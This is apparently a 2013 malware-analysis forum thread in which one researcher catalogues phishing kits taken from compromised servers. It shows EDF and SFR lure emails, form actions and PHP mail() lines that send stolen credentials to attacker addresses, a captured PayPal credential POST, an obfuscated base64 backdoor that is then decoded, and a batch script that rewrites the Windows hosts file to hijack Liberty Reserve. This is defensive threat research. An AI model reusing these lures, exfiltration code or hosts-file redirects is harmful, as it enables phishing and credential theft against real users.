A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18221  by Xylitol
 Sat Feb 16, 2013 5:31 pm
EDF Phishing, html form attached to mail.
dzwasqw.com as domain like before.
https://www.virustotal.com/fr/file/ef81 ... 361036397/
Code: Select all
<form class="form" name ="darnoo" id="darnoo" method="post"  onsubmit="return verif_formulaire()" action="http://dzwasqw.com/news.php" enctype="application/x-www-form-urlencoded">
severals other crap also in attach
Attachments
infected
(519.16 KiB) Downloaded 66 times
 #18316  by Xylitol
 Sat Feb 23, 2013 9:46 am
EDF: http://www.phishtank.com/phish_detail.p ... id=1744379
https://www.virustotal.com/fr/url/8d736 ... 361612707/

chichi.php:
Code: Select all
$send = "vbv.se2013@gmail.com,x-vbv2013@voila.fr"; 
Mail source:
Code: Select all
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 114.141.201.34) smtp.mailfrom=me@localhost.com; dkim=none; x-hmca=none
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0xO1NDTD0z
X-Message-Info: aKlYzGSc+LlaTh0Akp53ufvjAZluO5efh5geSw0oo+GpwG77dvJXRPqaytLkxzNXtd7G5FAWnuN/bopfHx/hFziWrm/Jv8o5is8iMbh6Y9UdCAzEoOJpF6l+4GrbBO9+Q/s8V1o6DXQ7mP+21CIl1wWH5fzQ1JAD
Received: from mail.ozlocal.com.au ([114.141.201.34]) by COL0-MC2-F34.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Wed, 20 Feb 2013 13:18:06 -0800
Received: from 114-141-202-116 ([127.0.0.1])
        by mail.ozlocal.com.au (Merak 8.9.0-1) with SMTP id FXL32740
        for <**************@hotmail.fr>; Thu, 21 Feb 2013 08:17:40 +1100
Date: Thu, 21 Feb 2013 08:17:40 ¸1000
Subject: [Edf.FR] - Relance pour une facture impayee !
To: **************@hotmail.fr
From:  <Edf@ Mail.fr>
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Return-Path: me@localhost.com
Message-ID: <COL0-MC2-F34Lsp5YB2001fd6b1@COL0-MC2-F34.Col0.hotmail.com>
X-OriginalArrivalTime: 20 Feb 2013 21:18:07.0101 (UTC) FILETIME=[C6E67AD0:01CE0FAF]

<span style="font-size:26px">Votre espace Client</span><br>
			<br>
			<strong style="font-size:12px">Cher client, chère cliente,</strong><br>
			<br>
			<span style="font-size:12px">Malheureusement, l'équipe Edf a constaté que votre dernière facture n'est pas encore payée. Nous vous invitons à régler vote situation en ligne pour éviter la pénalité du retard. Avec le lien suivant, vous pouvez régler votre facture :</span>
		<table height="153" width="569">
			<tbody>
				<tr>
					<td align="right" valign="top">
						 </td>
				</tr>
				<tr>
					<td colspan="2" style="font-size:12px;color:rgb(112,112,112);font-family:Arial,Helvetica,sans-serif" align="left">
						<br>
						<table bgcolor="#345ca3" border="0" cellpadding="15" cellspacing="0" width="570">
							<tbody>
								<tr>
									<td style="color:rgb(255,255,255)" align="center">
										<a href="http://www.sfhregistre.org/media/system/swf/Edf/" target="_blank"><font color="#ffffff" size="4">Régler votre facture </font><span style="color:rgb(255,255,255)"><span style="font-size:18px">Electronique N° J05022013</span></span> </a></td>
								</tr>
							</tbody>
						</table>
					</td>
				</tr>
				<tr>
					<td colspan="2" style="font-size:12px;color:rgb(112,112,112);font-family:Arial,Helvetica,sans-serif" align="left">
						<p>
							<span style="display:inline!important;word-spacing:0px;font-family:arial,sans-serif;font-style:normal;font-variant:normal;font-weight:normal;font-size:13px;line-height:normal;font-size-adjust:none;font-stretch:normal;text-transform:none;color:rgb(34,34,34);text-indent:0px;white-space:normal;letter-spacing:normal"><font color="#737373">Nous vous rappelons qu’avec votre espace Client, vous bénéficiez 7j/7 et 24h/24 de nombreux avantages et services qui vous permettront de simplifier la gestion de vos contrats.</font></span><br>
							<span style="display:inline!important;word-spacing:0px;font-family:arial,sans-serif;font-style:normal;font-variant:normal;font-weight:normal;font-size:13px;line-height:normal;font-size-adjust:none;font-stretch:normal;text-transform:none;color:rgb(34,34,34);text-indent:0px;white-space:normal;letter-spacing:normal"><font color="#737373">Cordialement,<br>
							Conseiller EDF Bleu Ciel</font></span></p>
					</td>
				</tr>
			</tbody>
		</table>
		<table>
			<tbody>
				<tr>
					<td width="35">
						<img border="0" height="1" width="1"></td>
				</tr>
			</tbody>
		</table>
		<table border="0" cellpadding="0" cellspacing="0" width="674">
			<tbody>
				<tr>
					<td width="61">
						 </td>
					<td style="font-size:10px;color:rgb(112,112,112);font-family:Arial,Helvetica,sans-serif" align="left">
						<div>
							Ce message vous est adressé automatiquement. Nous vous remercions de ne pas répondre, ni d'utiliser cette adresse email.<br>
							ATTENTION : Ce message est strictement confidentiel. Son intégrité n'est pas assurée sur Internet. Si vous n'êtes pas destinataire du message, merci de le détruire.<br>
							<br>
							Copyright © EDF 2013</div>

Attachments
infected
(462.26 KiB) Downloaded 64 times
 #18403  by Xylitol
 Sat Mar 02, 2013 3:34 pm
redirector:
http://www.phishtank.com/phish_detail.p ... id=1751290
phishs:
http://www.phishtank.com/phish_detail.p ... id=1751315
http://www.phishtank.com/phish_detail.p ... id=1751304
http://www.phishtank.com/phish_detail.p ... id=1751292

Mail source:
Code: Select all
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 82.98.167.163) smtp.mailfrom=service@sfr_mail.fr; dkim=none header.d=sfr_mail.fr; x-hmca=none
X-SID-PRA: service@sfr_mail.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: 12l2I64mAZSWFhQ0inhVxAVzsjGYsff35aXkapIX2Y6BZyPYPlOgB2x+8Zs0JUukQfjv9xb6BSycqMBDNxV0SdiqJZrh0t9KDyMvDPT1gQL4NVYW8z+yFT6SYxcLl2bzgiwNRBgGeKUkoooYSA2Rs+mY5cOQkwJN
Received: from vl403.dinaserver.com ([82.98.167.163]) by COL0-MC1-F18.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Fri, 1 Mar 2013 09:15:17 -0800
Received: by vl403.dinaserver.com (Postfix, from userid 30007)
	id BA54E19EB46; Fri,  1 Mar 2013 18:15:07 +0100 (CET)
To: *******************@hotmail.fr
Subject: PV: FA53-TNG12-UT9
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Service Clients <service@sfr_mail.fr>
Message-Id: <20130301171507.BA54E19EB46@vl403.dinaserver.com>
Date: Fri,  1 Mar 2013 18:15:07 +0100 (CET)
X-DinaScanner-Information: DinaScanner. Filtro anti-Spam y anti-Virus
X-MailScanner-ID: BA54E19EB46.ECE92
X-DinaScanner: Libre de Virus
X-DinaScanner-SpamCheck: no es spam, SpamAssassin (almacenado, puntaje=2.819,
	requerido 6, BAYES_00 -2.60, HTML_MESSAGE 0.00,
	HTML_MIME_NO_HTML_TAG 0.10, MIME_HTML_ONLY 1.46, NO_RELAYS -0.00,
	SUBJ_ALL_CAPS 2.08, URIBL_PH_SURBL 1.79)
X-DinaScanner-SpamScore:  2.82
X-DinaScanner-From: service@sfr_mail.fr
X-Spam-Status: No
Return-Path: service@sfr_mail.fr
X-OriginalArrivalTime: 01 Mar 2013 17:15:18.0254 (UTC) FILETIME=[58E898E0:01CE16A0]


<br><dl style="display:none" class="allheaders"><dt class="fullHeader">Authentication-Results : </dt><dd>sfrmc.priv.atos.fr; dkim=none (no signature);<br>	dkim-adsp=none (no policy) header.from=service@box-sfr.fr</dd><br><dt class="fullHeader">Content-type : </dt><dd>text/html; charset=iso-8859-1</dd><br><dt class="fullHeader">Date : </dt><dd>Fri, 22 Feb 2013 17:23:42 -0800 (PST)</dd><br><dt class="fullHeader">From : </dt><dd>"[E-Fact] _1-06MS-4256" <service@box-sfr.fr></dd><br><dt class="fullHeader">MIME-Version : </dt><dd>1.0</dd><br><dt class="fullHeader">Message-Id : </dt><dd><20130223012342.BFEE86BEC1ED@ve.kjk57hr6.vesrv.com></dd><br><dt class="fullHeader">Received : </dt><dd>by ve.kjk57hr6.vesrv.com (Postfix, from userid 33)<br>	id BFEE86BEC1ED; Fri, 22 Feb 2013 17:23:42 -0800 (PST)</dd><br><dt class="fullHeader">Received : </dt><dd>from filter.sfr.fr (localhost [64.207.153.29])<br>	by msfrf2419.sfr.fr (SMTP Server) with ESMTP id 928791C0009C<br>	for <tl2
 000000000000000005422450@back10-mail02-02.sfrmc.priv.atos.fr>; Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Received : </dt><dd>from msfrf2419.sfr.fr (msfrf2419 [10.18.29.33])<br>	 by msfrb1004 (Cyrus v2.3.16) with LMTPA;<br>	 Sat, 23 Feb 2013 13:20:55 +0100</dd><br><dt class="fullHeader">Received : </dt><dd>from ve.kjk57hr6.vesrv.com (unknown [64.207.153.29])<br>	by msfrf2419.sfr.fr (SMTP Server) with ESMTP	for <miriam.griffin@sfr.fr>;<br>	Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Received : </dt><dd>from ve.kjk57hr6.vesrv.com (unknown [64.207.153.29])<br>	by msfrf2419.sfr.fr (SMTP Server) with ESMTP id 854A11C00086<br>	for <miriam.griffin@sfr.fr>; Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Return-Path : </dt><dd><www-data@ve.kjk57hr6.vesrv.com></dd><br><dt class="fullHeader">Subject : </dt><dd>Notification de prelevements automatique</dd><br><dt class="fullHeader">To : </dt><d
 d>miriam.griffin@sfr.fr</dd><br><dt class="fullHeader">X-PHP-Originat
ing-Script : </dt><dd>33:salton.php(2) : eval()'d code</dd><br><dt class="fullHeader">X-SFR-UUID : </dt><dd>20130223122055431.6972B46DE@msfrf2419.sfr.fr</dd><br><dt class="fullHeader">X-Sieve : </dt><dd>CMU Sieve 2.3</dd><br><dt class="fullHeader">X-sfr-mailing : </dt><dd>LEGIT</dd><br><dt class="fullHeader">X-sfr-spam : </dt><dd>not-spam</dd><br><dt class="fullHeader">X-sfr-spamrating : </dt><dd>40.000000</dd><br></dl></dl></div></div><div class="attachments" dojoattachpoint="attachmentsDiv" style="display:none"><h3>Pièce(s) Jointe(s) :</h3><div class="attachmentsList"><ul dojoattachpoint="attachmentsNode"></ul></div></div><div dojoattachpoint="playerDivNode" style="display:none"></div></div><div class="overflowmails fullmail"><div style="display: none;" class="message_player"></div><div class="messageBody " id="message"><img src="http://www.burococon.nl/administrator/modules/aa11.png" alt="SFR" border="0">
<div></div>
	                                                                           
	     
	            <table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="top">
	            <p style="BORDER-RIGHT: 0pt; PADDING-RIGHT: 0pt; BORDER-TOP: 0pt; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 12px; PADDING-BOTTOM: 0pt; MARGIN: 15px 0pt 0pt; BORDER-LEFT: 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 0pt; BORDER-BOTTOM: 0pt; FONT-FAMILY: Arial">Votre
	conseiller sfr</p>
	            <p style="BORDER-RIGHT: 0pt; PADDING-RIGHT: 0pt; BORDER-TOP: 0pt; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 12px; PADDING-BOTTOM: 0pt; MARGIN: 15px 0pt 0pt; BORDER-LEFT: 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 0pt; BORDER-BOTTOM: 0pt; FONT-FAMILY: Arial">Cordialement,</p>
	            <p style="PADDING-RIGHT: 0pt; BORDER-TOP: rgb(54,172,2) 2px dotted; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 11px; PADDING-BOTTOM: 5px; MARGIN: 20px 0pt 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 5px; BORDER-BOTTOM: rgb(241,172,2) 2px dotted; FONT-FAMILY: Arial; TEXT-ALIGN: right">
	Votre Espace Client <a href="internet-marketing.web.id/wp-load.php" style="FONT-WEIGHT: bold; FONT-SIZE: 11px; COLOR: rgb(54,54,54); FONT-FAMILY: Arial; TEXT-DECORATION: underline" target="_blank">
	espace Client</a></p>
      <p><img src="http://www.burococon.nl/administrator/modules/aa22.png" alt="" border="0">










Notification de prelevements automatique
service@box-sfr.fr
sfr:
Code: Select all
<?php
$send="undomia.result@gmail.com,ayhamox0102030@gmail.com"; // will send the results at this address.     
skat:
Code: Select all
mail("undomia.result@gmail.com,ayhamox0102030@gmail.com", $subj, $msg); 
visa:
Code: Select all
mail("ayhamox0102030@gmail.com",$subj,$msg,$from);
Backdoors: http://www.kernelmode.info/forum/viewto ... =20#p18402
Attachments
infected
(1.55 MiB) Downloaded 70 times
 #18404  by Xylitol
 Sat Mar 02, 2013 5:19 pm
previous machine (saturdaymorninggarage.com) lead to another compromised server now (?!)
they run Joomla and phishings for SFR and free.fr
dump in attach as usual.
http://www.phishtank.com/phish_detail.p ... id=1751320
http://www.phishtank.com/phish_detail.p ... id=1751343

sfr:
Code: Select all
$ana = "rbati2012@gmail.com";
free:
Code: Select all
$from = "From: FREE REZULT<rbati2012@gmail.com>"; 
http://www.restfulwhois.com/v1/gobiernodecojedes.com
Attachments
infected
(445.47 KiB) Downloaded 59 times
 #18570  by Xylitol
 Mon Mar 18, 2013 8:29 am
EDF phish on compromised joomla
redirector: http://www.phishtank.com/phish_detail.p ... id=1764375
phish: https://www.phishtank.com/phish_detail. ... id=1764377
Code: Select all
$send = "th3.joker@hotmail.fr";
$subject = "EDF : $ip";
$from = "From: Mr.HiTman<th3.joker@hotmail.fr>";

mail($send,$subject,$message,$from); 
Attachments
infected
(456.3 KiB) Downloaded 65 times
 #18860  by Xylitol
 Sun Apr 07, 2013 8:11 am
Paypal
https://www.virustotal.com/fr/file/1379 ... 365322167/
Code: Select all
<form method="post" action="https://www.misehardre.com/test.php" class=" edit">
Code: Select all
----------------------------------------------------------
https://www.misehardre.com/test.php

POST /test.php HTTP/1.1
Host: www.misehardre.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 931
cmd=_flow&cid=&CONTEXT=X3-7SZn2ExXucINxlliZ_05NdFsrIIpaV9TcRYNLL_GiOwm9XgEZzWKQeV0&myAllTextSubmitID=&nav=0.5.2&SESSION=-oOJYfJOm7TVIu-q67PWMFUUkLWytiKoYt0ovcoPcryKfzLA982CdRdzD2i&dispatch=5885d80a13c0db1f8e263663d3faee8db2b24f7b84f1819343fd6c338b1d9d60&LastFlowDispatch=5885d80a13c0db1f8e263663d3faee8db2b24f7b84f1819343fd6c338b1d9d60&flag_from_account_summary=1&LastRapidsSession=-oOJYfJOm7TVIu-q67PWMFUUkLWytiKoYt0ovcoPcryKfzLA982CdRdzD2i&outdated_page_tmpl=p%2Fgen%2Ffailed-to-load&login_email=ptheisen.mn%40netzero.net&cc_brand=&firstname=&lastname=&dobd=&dobm=&doby=&mother=&credit_card_type=+&cc_country_code=IL&address_country_code=IL&address=&address1=&state=&city=&country=&zip=&Next=Next&auth=EPs7ROY-CA08N6uDAUV0a8FvMQrpogx68yPkSTOXYz9tq0j4suaVeGIPmxyRamzhDmNhIjJ-HsabddzW9rjvSNqt9vnWVtP03gmczIvUcP2jvfFvM4GcUZ3z6dAREs9k3fzPkJ1x7MzqLaAATDA-up94c5CFmZlc2hLFcN6NQBLrlUUH4DEKf1H8aR3PFpK-jtCwpRI1SmcI1hZ5&form_charset=UTF-8
HTTP/1.1 302 Moved Temporarily
Date: Sun, 07 Apr 2013 08:17:58 GMT
Server: Apache
Location: http://www.paypal.com/cgi-bin/webscr?cmd=_login-run
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
----------------------------------------------------------
https://www.virustotal.com/fr/url/644ef ... 365322482/
Attachments
infected
(5.99 KiB) Downloaded 62 times
 #19028  by Xylitol
 Sun Apr 21, 2013 2:53 pm
Sparkasse, Paypal, Bank Of America, phishing dumped from compromissed servers.
Thanks to markusg for the link.

Sparkasse:
Code: Select all
$myemail = "rbati2014@gmail.com"; //email hna      
Paypal:
Code: Select all
$send = array("tonijuve28@hotmail.com");
Bank Of America:
Code: Select all
$suck = "tonijuve10@inbox.com";
Something fun about the Bank Of America phishing is this backdoor:
Code: Select all
eval(gzinflate(base64_decode('bWFpbChtYWNob3lncmV5NUBnbWFpbC5jb20sJHN1YmplY3QsJHNwYW0sJGhlYWRlcnMpOw==')));
decoded:
Code: Select all
mail(machoygrey5@gmail.com,$subject,$spam,$headers);
Edit: Attached Gmail+Facebook phishing
https://www.phishtank.com/phish_detail. ... id=1795535
https://www.phishtank.com/phish_detail. ... id=1795536

edit 2: Attached liberty reserve phishing partially
https://www.phishtank.com/phish_detail. ... id=1795631
Attachments
infected
(6.44 KiB) Downloaded 57 times
infected
(28.58 KiB) Downloaded 60 times
infected
(2.3 MiB) Downloaded 87 times
 #19169  by Xylitol
 Thu May 02, 2013 7:59 pm
Some visa html crap in attach
Code: Select all
<form method="post" action=http://appscape.co.uk/mail.php>  
And the guys of liberty reserve phishing have recently do a malz with a legit hacktool and a batch file, everything packaged as SFX obviously the batch file is executed first:
Code: Select all
@echo off 
takeown /f "%windir%\system32\drivers\etc\hosts" && icacls "%windir%\system32\drivers\etc\hosts" /grant administrators:F
attrib -s -h -r %windir%\system32\drivers\etc\hosts
%windir%\notepad.exe %windir%\system32\drivers\etc\hosts
echo 69.195.86.234 libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 www.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 http://www.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 http://libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 http://sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 http://www.sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 https://www.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 https://libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 https://sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 https://www.sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
l33t.
I got three of his ip 2.193.219.253, 2.193.242.123, 2.193.251.246 who look's like dsl customers/proxies...
Attachments
infected
(3.39 KiB) Downloaded 60 times